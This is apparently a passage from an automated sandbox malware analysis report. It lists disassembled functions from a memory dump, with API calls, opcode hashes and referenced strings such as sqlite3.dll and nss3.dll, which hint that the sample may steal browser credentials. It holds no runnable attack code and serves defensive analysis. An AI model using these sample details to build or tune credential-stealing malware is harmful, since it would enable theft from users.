                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                            • String ID: menu_%d
                                                                            • API String ID: 1129539653-2417748251
                                                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                            Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                            • String ID: sqlite3.dll
                                                                            • API String ID: 1983510840-1155512374
                                                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                            Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8